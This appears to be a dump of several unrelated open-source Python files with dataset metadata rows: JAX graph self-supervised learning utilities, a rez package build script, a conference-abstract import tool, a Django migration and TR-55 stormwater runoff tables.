is_correct = jnp.any(pred_ranking == labels[:, jnp.newaxis], axis=1)
return (is_correct * valid_mask).sum()
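# Editor's note: a small worked example for topk_correct (hypothetical values,
# not part of the original module). With three classes:
#   logits = jnp.array([[0.1, 0.7, 0.2],
#                       [0.5, 0.3, 0.2]])
#   labels = jnp.array([2, 0])
#   valid_mask = jnp.array([1.0, 1.0])
#   topk_correct(logits, labels, valid_mask, topk=2)  # -> 2.0
# Row 0's label (2) holds the second-highest logit and row 1's label (0) holds
# the highest, so both rows count as top-2 correct.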
def ensemble_predictions_by_probability_average(
predictions_list: Sequence[Predictions]) -> Predictions:
"""Ensemble predictions by ensembling the probabilities."""
_assert_consistent_predictions(predictions_list)
all_probs = np.stack([
jax.nn.softmax(predictions.logits, axis=-1)
for predictions in predictions_list
],
axis=0)
ensembled_logits = np.log(all_probs.mean(0))
return predictions_list[0]._replace(
logits=ensembled_logits, predictions=np.argmax(ensembled_logits, axis=-1))
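# Editor's note (clarifying comment, not part of the original module): because
# the ensembled logits above are log(mean_i softmax(logits_i)), applying a
# softmax downstream recovers the averaged probabilities exactly; the mean of
# valid distributions already sums to one, so the renormalisation is a no-op.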
def get_accuracy_dict(predictions: Predictions) -> Dict[str, float]:
"""Returns the accuracy dict."""
output_dict = {}
output_dict['num_valid'] = predictions.predictions.shape[0]
matches = (predictions.labels == predictions.predictions)
output_dict['accuracy'] = matches.mean()
pred_ranking = jnp.argsort(predictions.logits, axis=1)[:, ::-1]
for k in range(1, 6):
matches = jnp.any(
pred_ranking[:, :k] == predictions.labels[:, None], axis=1)
output_dict[f'top_{k}_correct'] = matches.mean()
return output_dict
def bgrl_loss(
first_online_predictions: jnp.ndarray,
second_target_projections: jnp.ndarray,
second_online_predictions: jnp.ndarray,
first_target_projections: jnp.ndarray,
symmetrize: bool,
valid_mask: jnp.ndarray,
) -> Tuple[jnp.ndarray, LogsDict]:
"""Implements BGRL loss."""
first_side_node_loss = jnp.sum(
jnp.square(
_l2_normalize(first_online_predictions, axis=-1) -
_l2_normalize(second_target_projections, axis=-1)),
axis=-1)
if symmetrize:
second_side_node_loss = jnp.sum(
jnp.square(
_l2_normalize(second_online_predictions, axis=-1) -
_l2_normalize(first_target_projections, axis=-1)),
axis=-1)
node_loss = first_side_node_loss + second_side_node_loss
else:
node_loss = first_side_node_loss
loss = (node_loss * valid_mask).sum() / (valid_mask.sum() + 1e-6)
return loss, dict(bgrl_loss=loss)
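# Editor's note (clarifying comment, not part of the original module): since
# both vectors are L2-normalised before the squared difference, each per-node
# term equals 2 - 2 * cosine_similarity(prediction, target_projection), so
# minimising this loss maximises the cosine similarity between the online
# prediction and the target projection, matching the usual BYOL-style objective.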
def get_corrupted_view(
graph: jraph.GraphsTuple,
feature_drop_prob: float,
edge_drop_prob: float,
rng_key: jnp.ndarray,
) -> jraph.GraphsTuple:
"""Returns corrupted graph view."""
node_key, edge_key = jax.random.split(rng_key)
def mask_feature(x):
mask = jax.random.bernoulli(node_key, 1 - feature_drop_prob, x.shape)
return x * mask
# Randomly mask features with fixed probability.
nodes = jax.tree_map(mask_feature, graph.nodes)
# Simulate dropping of edges by changing genuine edges to self-loops on
# the padded node.
num_edges = graph.senders.shape[0]
last_node_idx = graph.n_node.sum() - 1
edge_mask = jax.random.bernoulli(edge_key, 1 - edge_drop_prob, [num_edges])
senders = jnp.where(edge_mask, graph.senders, last_node_idx)
receivers = jnp.where(edge_mask, graph.receivers, last_node_idx)
# Note that n_edge will now be invalid since edges in the middle of the list
# will correspond to the final graph. Set n_edge to None to ensure we do not
# accidentally use this.
return graph._replace(
nodes=nodes,
senders=senders,
receivers=receivers,
n_edge=None,
)
def _assert_consistent_predictions(predictions_list: Sequence[Predictions]):
first_predictions = predictions_list[0]
for predictions in predictions_list:
assert np.all(predictions.node_indices == first_predictions.node_indices)
assert np.all(predictions.labels == first_predictions.labels)
assert np.all(
predictions.predictions == np.argmax(predictions.logits, axis=-1))
def _l2_normalize(
x: jnp.ndarray,
axis: Optional[int] = None,
epsilon: float = 1e-6,
) -> jnp.ndarray:
return x * jax.lax.rsqrt(
jnp.sum(jnp.square(x), axis=axis, keepdims=True) + epsilon)
|
apache-2.0
| -7,726,497,317,545,474,000 | 32.437186 | 80 | 0.681996 | false |
nerdvegas/rez
|
src/rez/data/tests/release/build.py
|
1
|
1566
|
from __future__ import print_function
import shutil
import os.path
import os
import sys
def build(source_path, build_path, install_path, targets):
def _copy(src, dest):
print("copying %s to %s..." % (src, dest))
if os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(src, dest)
# build
src = os.path.join(source_path, "data")
dest = os.path.join(build_path, "data")
_copy(src, dest)
if "install" not in (targets or []):
return
# install
src = os.path.join(build_path, "data")
dest = os.path.join(install_path, "data")
_copy(src, dest)
if __name__ == '__main__':
build(
source_path=os.environ['REZ_BUILD_SOURCE_PATH'],
build_path=os.environ['REZ_BUILD_PATH'],
install_path=os.environ['REZ_BUILD_INSTALL_PATH'],
targets=sys.argv[1:]
)
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
|
lgpl-3.0
| -7,258,360,811,447,583,000 | 28.54717 | 79 | 0.667944 | false |
brigittebigi/proceed
|
proceed/scripts/import.py
|
1
|
9928
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# ---------------------------------------------------------------------------
# ___ __ ___ ___ ____ ____ __
# | \ | \ | | / | | | \ Automatic
# |__/ |__/ | | | |__ |__ | | Conference
# | |\_ | | | | | | | Proceedings
# | | \ |___| \___ |___ |___ |__/ Generator
# ==========================================================
#
# http://www.lpl-aix.fr/~bigi/
#
# ---------------------------------------------------------------------------
# developed at:
#
# Laboratoire Parole et Langage
#
# Copyright (C) 2013-2014 Brigitte Bigi
#
# Use of this software is governed by the GPL, v3
# This banner notice must not be removed
# ---------------------------------------------------------------------------
#
# SPPAS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SPPAS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SPPAS. If not, see <http://www.gnu.org/licenses/>.
#
# ---------------------------------------------------------------------------
__docformat__ = "epytext"
"""
Import abstracts from a conference and save them in a directory,
in the form of one latex file per abstract.
Input can be one of sciencesconf XML file or easychair CSV file.
No options for the output style: use default.
"""
# ---------------------------------------------------------------------------
import sys
import os.path
import getopt
sys.path.append( os.path.join(os.path.dirname(os.path.dirname( os.path.abspath(__file__))), "src") )
from DataIO.Read.reader import Reader
from DataIO.Write.writer import Writer
from structs.prefs import Preferences
from structs.abstracts_themes import all_themes
from term.textprogress import TextProgress
from term.terminalcontroller import TerminalController
from sp_glob import program, author, version, copyright, url
wxop = True
try:
import wx
from wxgui.frames.import_wizard import ImportWizard
except Exception:
wxop = False
# ----------------------------------------------------------------------
# USEFUL FUNCTIONS
# ----------------------------------------------------------------------
def usage(output):
"""
Print the usage of this script on an output.
@param output is a string representing the output (for example: sys.stdout)
"""
output.write('import.py [options] where options are:\n')
output.write(' -i file Input file name [required] \n')
output.write(' -a file Authors Input file name [required if easychair] \n')
output.write(' -o output Output directory [required] \n')
output.write(' -s status Status number (0-4) [default=1=accepted]\n')
output.write(' -r reader name One of: sciencesconf or easychair [default=sciencesconf]\n')
output.write(' -S style name One of: basic, palme, nalte [default=basic]\n')
output.write(' -c compiler One of: pdflatex, xetex [default=pdflatex]\n')
output.write(' --nocsv Do not generate '+program+' CSV files\n')
output.write(' --notex Do not generate LaTeX files\n')
output.write(' --nohtml Do not generate HTML file\n')
output.write(' --help Print this help\n\n')
# End usage
# ----------------------------------------------------------------------
def Quit(message=None, status=0, usageoutput=None):
"""
Quit the program with the appropriate exit status.
@param message is a text to communicate to the user on sys.stderr.
@param status is an integer of the status exit value.
@param usageoutput is a file descriptor.
"""
    if message: sys.stderr.write('import.py '+message)
if usageoutput: usage(usageoutput)
sys.exit(status)
# End Quit
# ----------------------------------------------------------------------
# --------------------------------------------------------------------------
# MAIN PROGRAM
# --------------------------------------------------------------------------
if __name__=="__main__":
# ----------------------------------------------------------------------
# Get all arguments, verify inputs.
# ----------------------------------------------------------------------
# Verify the program name and possibly some arguments
if len(sys.argv) == 1:
if not wxop:
# stop the program and print an error message
Quit(status=1, usageoutput=sys.stderr)
else:
app = wx.App(False)
ImportWizard(None)
app.MainLoop()
sys.exit(0)
# Get options (if any...)
try:
opts, args = getopt.getopt(sys.argv[1:], "i:a:o:s:r:S:c:", ["help", "nocsv", "notex", "nohtml"])
except getopt.GetoptError, err:
# Print help information and exit:
Quit(message="Error: "+str(err)+".\nUse option --help for any help.\n", status=1)
fileinput = None
authorsinput = None
output = None
extension = "tex"
status = 1 # only accepted papers
readername = "sciencesconf"
themename = "basic"
compiler = "pdflatex"
exportcsv = True
exporttex= True
exporthtml = True
# Extract options
for o, a in opts:
if o == "-i":
fileinput = a
elif o == "-a":
authorsinput = a
elif o == "-o":
output = a
elif o == "-s":
status = int(a)
elif o == "-r":
readername = a
elif o == "-S":
themename = a
elif o == "-c":
compiler = a
elif o == "--help": # need help
Quit(message='Help', status=0, usageoutput=sys.stdout)
elif o == "--nocsv":
exportcsv = False
elif o == "--notex":
exporttex = False
elif o == "--nohtml":
exporthtml = False
# Verify args
if fileinput is not None:
if not os.path.exists(fileinput):
Quit(message="Error: BAD input file name: "+fileinput+"\n", status=1)
else:
Quit(message="Error: an input is required.\n.", status=1, usageoutput=sys.stderr)
if output is None:
Quit(message="Error: an output is required.\n.", status=1, usageoutput=sys.stderr)
if readername == "easychair" and not authorsinput:
Quit(message="With easychair, an input file with authors is required.", status=1, usageoutput=sys.stderr)
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}'+program+' - Version '+version+'${NORMAL}')
print term.render('${BLUE}'+copyright+'${NORMAL}')
print term.render('${BLUE}'+url+'${NORMAL}')
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print '-----------------------------------------------------------------------\n'
print program+' - Version '+version
print copyright
print url+'\n'
print '-----------------------------------------------------------------------\n'
# ----------------------------------------------------------------------
p = TextProgress()
# ----------------------------------------------------------------------
# Load input data
# ----------------------------------------------------------------------
arguments = {}
arguments['readername'] = readername
arguments['filename'] = fileinput
arguments['authorsfilename'] = authorsinput
arguments['progress'] = p
reader = Reader( arguments )
# ----------------------------------------------------------------------
# Write output data (with default parameters)
# ----------------------------------------------------------------------
# Create preferences
prefs = Preferences()
theme = all_themes.get_theme(themename.lower())
prefs.SetTheme( theme )
prefs.SetValue('COMPILER', 'str', compiler.strip())
# Create the Writer
writer = Writer( reader.docs )
writer.set_status( status )
writer.set_progress( p )
# Write abstracts as LaTeX
if exporttex:
writer.writeLaTeX_as_Dir( output, prefs, tocompile=True )
# Write proceed native CSV files
if exportcsv:
writer.writeCSV( output )
# Write html file
if exporthtml:
writer.writeHTML( output+".html" )
# Done
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}Result is in '+output)
print term.render('${GREEN}Thank you for using '+program+".")
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print ('-----------------------------------------------------------------------\n')
print "Result is in "+output+".\nThank you for using "+program+"."
print ('-----------------------------------------------------------------------\n')
# ----------------------------------------------------------------------
|
gpl-3.0
| -6,585,036,941,953,271,000 | 36.044776 | 119 | 0.463638 | false |
phith0n/mooder
|
managements/migrations/0001_initial.py
|
1
|
1376
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-10 14:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CoinLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('coin', models.IntegerField(verbose_name='金币变化')),
('rest', models.PositiveIntegerField(verbose_name='变化后的金币')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('last_modify_time', models.DateTimeField(auto_now=True, verbose_name='修改时间')),
('admin', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='coin_from_user', to=settings.AUTH_USER_MODEL, verbose_name='操作员')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='coin_to_user', to=settings.AUTH_USER_MODEL, verbose_name='目标用户')),
],
),
]
|
lgpl-3.0
| 4,721,096,928,858,244,000 | 41.774194 | 193 | 0.638009 | false |
WikiWatershed/tr-55
|
tr55/tables.py
|
1
|
19396
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
"""
TR-55 tables
"""
# For the different land uses, this describes the NLCD class value, the landscape factor (ki) and the Curve
# Numbers for each hydrologic soil group for that use type.
# NOTE: Missing NLCD type 12 (plus all Alaska only types (51, 72-74))
# For the BMPs, the numbers are not Curve Numbers; they are quantities of rainfall (in inches)
# that will be converted to infiltration by that BMP for that soil type.
# The Food and Agriculture Organization of the United Nations (FAO) document on evapotranspiration is:
# Allen, R.G.; Pereira, L.S.; Raes, D.; Smith, M. Evapotranspiration and Crop Water Requirements;
# Irrigation and Drainage Paper No. 56; FAO: Rome, 1998.
# Available: http://www.fao.org/docrep/x0490e/x0490e00.htm#Contents
LAND_USE_VALUES = {
# NRCS Curve Numbers for NLCD land classes
'open_water': {'nlcd': 11, 'ki': 0.6525, 'cn': {'a': 100, 'b': 100, 'c': 100, 'd': 100}},
# Curve Number Source: Assumes 100% runoff
# Ki Source: FAO for Open Water, > 5 m depth, clear of turbidity, temperate climate.
'perennial_ice': {'nlcd': 12, 'ki': 0.0, 'cn': {'a': 100, 'b': 100, 'c': 100, 'd': 100}},
# Curve Number Source: Assumes 100% runoff
# Ki Source: Assumes no ET.
'developed_open': {'nlcd': 21, 'ki': 0.95, 'cn': {'a': 59, 'b': 75, 'c': 83, 'd': 87}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 20% impervious.
# (TR-55, 1986, Table 2-2a)
# Ki Source: FAO for growing season for cool season turfgrass (dense stands of bluegrass, ryegrass, and fescue).
'developed_low': {'nlcd': 22, 'ki': 0.42, 'cn': {'a': 68, 'b': 80, 'c': 86, 'd': 89}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 38% impervious.
# (TR-55, 1986, Table 2-2a)
# Ki Source: UNKNOWN
'developed_med': {'nlcd': 23, 'ki': 0.18, 'cn': {'a': 81, 'b': 88, 'c': 91, 'd': 93}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 65% impervious.
# (TR-55, 1986, Table 2-2a)
# Ki Source: UNKNOWN
'developed_high': {'nlcd': 24, 'ki': 0.06, 'cn': {'a': 91, 'b': 94, 'c': 95, 'd': 96}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 85% impervious.
# Ki Source: UNKNOWN
'barren_land': {'nlcd': 31, 'ki': 0.30, 'cn': {'a': 77, 'b': 86, 'c': 91, 'd': 94}},
# Curve Number Source: Fallow, Bare soil; Newly graded areas (TR-55, 1986, Table 2-2a and 2-2b)
# Ki Source: Sridhar, Venkataramana, "Evapotranspiration Estimation and Scaling Effects Over The Nebraska Sandhills"
# (2007). Great Plains Research: A Journal of Natural and Social Sciences. Paper 870.
# http://digitalcommons.unl.edu/greatplainsresearch/870
'deciduous_forest': {'nlcd': 41, 'ki': 1.0, 'cn': {'a': 30, 'b': 55, 'c': 70, 'd': 77}},
# Curve Number Source: Woods, Good condition;
# Woods are protected from grazing and litter and brush adequately cover the soil.
# (TR-55, 1986, Table 2-2c)
# Ki Source: Sridhar, Venkataramana, "Evapotranspiration Estimation and Scaling Effects Over The Nebraska Sandhills"
# (2007). Great Plains Research: A Journal of Natural and Social Sciences. Paper 870.
# http://digitalcommons.unl.edu/greatplainsresearch/870
'evergreen_forest': {'nlcd': 42, 'ki': 1.00, 'cn': {'a': 30, 'b': 55, 'c': 70, 'd': 77}},
# Curve Number Source: Woods, Good condition;
# Woods are protected from grazing and litter and brush adequately cover the soil.
# (TR-55, 1986, Table 2-2c)
# Ki Source: FAO for conifer trees during growing season in well-watered conditions for large forests.
'mixed_forest': {'nlcd': 43, 'ki': 1.0, 'cn': {'a': 30, 'b': 55, 'c': 70, 'd': 77}},
# Curve Number Source: Woods, Good condition;
# Woods are protected from grazing and litter and brush adequately cover the soil.
# (TR-55, 1986, Table 2-2c)
# Ki Source: Sridhar, Venkataramana, "Evapotranspiration Estimation and Scaling Effects Over The Nebraska Sandhills"
# (2007). Great Plains Research: A Journal of Natural and Social Sciences. Paper 870.
# http://digitalcommons.unl.edu/greatplainsresearch/870
'shrub': {'nlcd': 52, 'ki': 0.90, 'cn': {'a': 35, 'b': 56, 'c': 70, 'd': 77}},
# Curve Number Source: Brush, fair; 50-75% ground cover (TR-55, 1986, Table 2-2c)
# Ki Source: Descheemaeker, K., Raes, D., Allen, R., Nyssen, J., Poesen, J., Muys, B., Haile, M. and Deckers, J.
# 2011. Two rapid appraisals of FAO-56 crop coefficients for semiarid natural vegetation of the
# northern Ethiopian highlands. Journal of Arid Environments 75(4):353-359.
'grassland': {'nlcd': 71, 'ki': 1.08, 'cn': {'a': 30, 'b': 58, 'c': 71, 'd': 78}},
# Curve Number Source: Meadow - continuous grass, protected from grazing and generally mowed for hay.
# (TR-55, 1986, Table 2-2c)
# Ki Source: Average of all values in FAO document for Forages/Hay.
'pasture': {'nlcd': 81, 'ki': 0.95, 'cn': {'a': 39, 'b': 61, 'c': 74, 'd': 80}},
# Curve Number Source: Pasture, good; >75% ground cover and not heavily grazed. (TR-55, 1986, Table 2-2c)
# Ki Source: FAO for Grazing pasture with rotated grazing.
'cultivated_crops': {'nlcd': 82, 'ki': 1.15, 'cn': {'a': 67, 'b': 78, 'c': 85, 'd': 89}},
# Curve Number Source: Row crops, straight rows, good condition (TR-55, 1986, Table 2-2b)
# Ki Source: FAO average for all cereal crows during the growing season.
'woody_wetlands': {'nlcd': 90, 'ki': 1.20, 'cn': {'a': 30, 'b': 30, 'c': 30, 'd': 30}},
# Curve Number Source: Uses lowest curve numbers possible to maximize infiltration
# Ki Source: FAO for either Cattail/Bulrush wetland or Reed Swamp wetland during growing season.
'herbaceous_wetlands': {'nlcd': 95, 'ki': 1.20, 'cn': {'a': 30, 'b': 30, 'c': 30, 'd': 30}},
# Curve Number Source: Uses lowest curve numbers possible to maximize infiltration
# Ki Source: FAO for either Cattail/Bulrush wetland or Reed Swamp wetland during growing season.
    # NRCS Curve Numbers for BMPs acting as land cover changes
'cluster_housing': {'ki': 0.42, 'cn': {'a': 62, 'b': 77, 'c': 84, 'd': 88}},
# Curve Number Source: Blend of Pasture - medium and paved parking assuming 26.8% impervious.
# Ki Source: UNKNOWN
'no_till': {'ki': 0.9, 'cn': {'a': 57, 'b': 73, 'c': 82, 'd': 86}},
# Curve Number Source: UNKNOWN
# Ki Source: UNKNOWN
    # Storage Capacities and Maximum Loading Ratios for Infiltration BMPs
# storage is in m3/m2, max_drainage_ratio is the ratio of drawn BMP area to
# the maximum possible area that should contribute to it.
    # NOTE that these contributing area ratios are based only on the suggested
    # drainage areas for well-designed BMPs and have nothing to do with the
# user's actual placement of the BMP on the UI map.
'green_roof': {'ki': 0.4, 'storage': 0.020, 'max_drainage_ratio': 1},
# Assume a simple extensive vegetated roof cover with 2" of growth media
# at 15% porosity and 2" of granular discharge media at 25% porosity
# Assume drainage area is equal only to the water that falls directly on the roof
# (no extra contributing area).
# Source: PA stormwater manual 6.5.1
'infiltration_basin': {'ki': 0.0, 'storage': 0.610, 'max_drainage_ratio': 8},
# Assume a large open area with no infiltration underneath and 2' of ponding depth (100% porosity)
# Assume drainage area is largely pervious surface (lawns) allowing a maximum loading ratio of 8:1
# Source: New Jersey stormwater manual, PA stormwater manual appendix C
'porous_paving': {'ki': 0.0, 'storage': 0.267, 'max_drainage_ratio': 2},
# Assume porous bituminous asphalt used as the paving surface
# 2.5" of porous paving service at 16% porosity, 1" of bedding layer/choker course at 50% porosity,
# and 24" of infiltration bed/reservoir layer at 40% porosity
# Assume some allowable additional drainage area (2:1) from roofs or adjacent pavement
# Note that inflow from any pervious areas is not recommended due to potential clogging
# Sources: PA stormwater manual 6.4.1,
# StormTech (http://www.stormtech.com/download_files/pdf/techsheet1.pdf),
# http://www.construction.basf.us/features/view/pervious-pavements,
# http: // stormwater.pca.state.mn.us / index.php / Design_criteria_for_permeable_pavement
'rain_garden': {'ki': 0.08, 'storage': 0.396, 'max_drainage_ratio': 5},
# Assumes 6" of ponding depth at 100% porosity, 24" planting mix at 20% porosity
# and 12" gravel underbed at 40% porosity.
# Assume drainage area is largely impervious (parking lots) allowing a maximum loading ratio of 5:1
# Source: PA stormwater manual 6.4.5, PA stormwater manual appendix C
}
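# Editor's note: a minimal lookup sketch (not part of the original module).
# Each entry above pairs a landscape factor (ki) with NRCS curve numbers keyed
# by hydrologic soil group, so, for example:
#   LAND_USE_VALUES['pasture']['cn']['b']      # -> 61
#   LAND_USE_VALUES['pasture']['ki']           # -> 0.95
# and for the infiltration BMPs 'storage' is a depth in m3/m2, e.g.
#   LAND_USE_VALUES['rain_garden']['storage']  # -> 0.396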
# Runoff tables for Pitt's Small Storm Hydrology (SSH) model
# The raw runoff coefficients are those measured by the USGS in Wisconsin
# (Bannerman 1983, 1992 and 1993; Horwatich, 2004; Steuer 1996 and 1997; USEPA 1993; Walker 1994; Waschbusch 1999)
# This data is also provided as the Rv (runoff coefficient) file for all regions *but* the SouthEast in version 10.x of WinSlamm #
# http://wi.water.usgs.gov/slamm/index.html
# http://wi.water.usgs.gov/slamm/slamm_parameter_descriptions.htm
# http://winslamm.com/Select_documentation.html #
#
# The Standard Land Uses, including the percentages of land in each area type and their level of connectedness,
# are collected from multiple published papers analyzing different sites using WinSLAMM
# Pitt has compiled all of the site summaries here:
# http://winslamm.com/docs/Standard%20Land%20Use%20and%20Parameter%20file%20descriptions%20final%20April%2018%202011.pdf
# The above pdf also lists the original sources of the raw data. #
#
# The final runoff volumes and runoff ratios for each standard land use were calculated as the sum of the products of the raw runoff coefficient
# for each area type and the percent of land in that area type in each standard land use.
#
# For this work, this is the mapping used between the NLCD class and the SSH's Standard Land Use:
# NLCD class 21 (Developed, Open) = "Open Space"
# NLCD class 22 (Developed, Low) = "Residential"
# NLCD class 23 (Developed, Medium) = "Institutional"
# NLCD class 24 (Developed, High) = "Commercial"
# The runoff coeffients for Cluster Housing were derived by taking the numbers for the residential SLU and
# halving the amount of street, driveway, and parking and adding that amount to the amount of small
# landscaping. This simulates LID concentrating housing and decreasing paving, while maintaining the
# same residential density (ie, the same amount of roof space).
SSH_RAINFALL_STEPS = [0.01, 0.08, 0.12, 0.2, 0.39, 0.59, 0.79, 0.98, 1.2, 1.6, 2, 2.4, 2.8, 3.2, 3.5, 3.9, 4.9]
SSH_RUNOFF_RATIOS = {
'developed_open' :
{'runoff_ratio':
{'a': [0.0393, 0.0472, 0.0598, 0.0645, 0.1045, 0.1272, 0.1372, 0.1432, 0.1493, 0.1558, 0.1609, 0.1637, 0.1662, 0.1686, 0.1711, 0.1726, 0.1757],
'b': [0.0393, 0.0472, 0.0598, 0.0645, 0.1177, 0.1462, 0.1636, 0.1697, 0.1809, 0.1874, 0.3127, 0.3148, 0.3165, 0.3182, 0.3199, 0.3206, 0.3229],
'c': [0.0393, 0.0472, 0.0598, 0.0645, 0.1193, 0.1528, 0.1769, 0.1904, 0.2008, 0.2423, 0.3127, 0.3148, 0.3165, 0.3182, 0.3199, 0.3624, 0.4066],
'd': [0.0393, 0.0472, 0.0598, 0.0645, 0.1193, 0.1528, 0.1769, 0.1904, 0.2008, 0.2423, 0.3127, 0.3148, 0.3165, 0.3182, 0.3199, 0.3624, 0.4066],
}
},
'developed_low' :
{'runoff_ratio':
{'a' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1841, 0.2053, 0.2138, 0.2187, 0.2249, 0.2303, 0.2359, 0.2382, 0.2412, 0.2439, 0.2465, 0.2485, 0.2523],
'b' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1960, 0.2224, 0.2377, 0.2426, 0.2534, 0.2589, 0.3731, 0.3748, 0.3770, 0.3791, 0.3809, 0.3822, 0.3853],
'c' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1974, 0.2284, 0.2496, 0.2614, 0.2714, 0.3085, 0.3731, 0.3748, 0.3770, 0.3791, 0.3809, 0.4200, 0.4609],
'd' : [0.0785, 0.1115, 0.1437, 0.1601, 0.1974, 0.2284, 0.2496, 0.2614, 0.2714, 0.3085, 0.3731, 0.3748, 0.3770, 0.3791, 0.3809, 0.4200, 0.4609],
}
},
'developed_med' :
{'runoff_ratio':
{'a' : [0.1322, 0.1929, 0.2631, 0.3107, 0.3698, 0.4032, 0.4235, 0.4368, 0.4521, 0.4688, 0.4816, 0.4886, 0.4953, 0.5006, 0.5047, 0.5074, 0.5138],
'b' : [0.1322, 0.1929, 0.2631, 0.3150, 0.3838, 0.4226, 0.4474, 0.4616, 0.4797, 0.4980, 0.5715, 0.5803, 0.5887, 0.5944, 0.6002, 0.6045, 0.6146],
'c' : [0.1322, 0.1929, 0.2631, 0.3150, 0.3846, 0.4258, 0.4539, 0.4717, 0.4895, 0.5249, 0.5715, 0.5803, 0.5887, 0.5944, 0.6002, 0.6248, 0.6553],
'd' : [0.1322, 0.1929, 0.2631, 0.3150, 0.3846, 0.4258, 0.4539, 0.4717, 0.4895, 0.5249, 0.5715, 0.5803, 0.5887, 0.5944, 0.6002, 0.6248, 0.6553],
}
},
'developed_high' :
{'runoff_ratio':
{'a': [0.1966, 0.2815, 0.4034, 0.4796, 0.5549, 0.6037, 0.6311, 0.6471, 0.6675, 0.6891, 0.7063, 0.7154, 0.7257, 0.7335, 0.7389, 0.7435, 0.7533],
'b': [0.1966, 0.2815, 0.4034, 0.4895, 0.5803, 0.6343, 0.6647, 0.6818, 0.7045, 0.7274, 0.7724, 0.7820, 0.7925, 0.8005, 0.8059, 0.8104, 0.8203],
'c': [0.1966, 0.2815, 0.4034, 0.4895, 0.5807, 0.6358, 0.6677, 0.6865, 0.7090, 0.7398, 0.7724, 0.7820, 0.7925, 0.8005, 0.8059, 0.8197, 0.8390],
'd': [0.1966, 0.2815, 0.4034, 0.4895, 0.5807, 0.6358, 0.6677, 0.6865, 0.7090, 0.7398, 0.7724, 0.7820, 0.7925, 0.8005, 0.8059, 0.8197, 0.8390],
}
},
'cluster_housing' :
{'runoff_ratio':
{'a': [0.0466, 0.0733, 0.0956, 0.1084, 0.1262, 0.1387, 0.1452, 0.1492, 0.1538, 0.1580, 0.1623, 0.1641, 0.1664, 0.1684, 0.1701, 0.1717, 0.1743],
'b': [0.0466, 0.0733, 0.0956, 0.1084, 0.1395, 0.1578, 0.1718, 0.1758, 0.1856, 0.1897, 0.3146, 0.3157, 0.3171, 0.3183, 0.3193, 0.3201, 0.3218],
'c': [0.0466, 0.0733, 0.0956, 0.1084, 0.1411, 0.1645, 0.1851, 0.1966, 0.2056, 0.2449, 0.3146, 0.3157, 0.3171, 0.3183, 0.3193, 0.3619, 0.4056],
'd': [0.0466, 0.0733, 0.0956, 0.1084, 0.1411, 0.1645, 0.1851, 0.1966, 0.2056, 0.2449, 0.3146, 0.3157, 0.3171, 0.3183, 0.3193, 0.3619, 0.4056],
}
},
}
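# Editor's note: illustrative sketch (not part of the original module). Each
# runoff_ratio list lines up element-for-element with SSH_RAINFALL_STEPS, so
# one way to read the table for an intermediate rainfall depth is linear
# interpolation between the tabulated steps, e.g.:
#   import numpy as np
#   ratios = SSH_RUNOFF_RATIOS['developed_med']['runoff_ratio']['b']
#   np.interp(1.0, SSH_RAINFALL_STEPS, ratios)  # runoff ratio for 1.0" on B soils
# (whether the model interpolates or picks the nearest step is up to the
# calling code; this is only a reading aid).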
# The set of best management practices that we know about. The
# cluster_housing and no_till types are excluded because they do not
# actively retain water.
BMPS = set(['green_roof', 'porous_paving',
'rain_garden', 'infiltration_basin'])
# The set of "built" land uses
# These are the land uses to which the Pitt model will be applied at less than 2" of rain.
BUILT_TYPES = set(['developed_open', 'developed_low', 'developed_med',
'developed_high', 'cluster_housing'])
NON_NATURAL = set(['pasture', 'cultivated_crops', 'green_roof']) | set(['no_till']) | BMPS | BUILT_TYPES
# The set of pollutants that we are concerned with.
POLLUTANTS = set(['tn', 'tp', 'bod', 'tss'])
# Event mean concentrations (mg/l) by pollutant and NLCD type
# tn: Total Nitrogen, tp: Total Phosphorus,
# bod: Biochemical Oxygen Demand, tss: Total Suspended Solids
# Data from:
# (1) USEPA, 2011. User’s Guide: Spreadsheet Tool for Estimation of Pollutant Load (STEPL), Version 4.1, 57 pp.
# (2) Pennsylvania Department of Environmental Protection, 2006.
# Pennsylvania Stormwater Best Management Practices Manual. 685 pp.
# (3) USEPA, 2005. The National Stormwater Quality Database, Version 1.2: A Compilation and Analysis of NPDES
# Stormwater Monitoring Information. USEPA, Office of Water, Washington, DC, 447 pp.
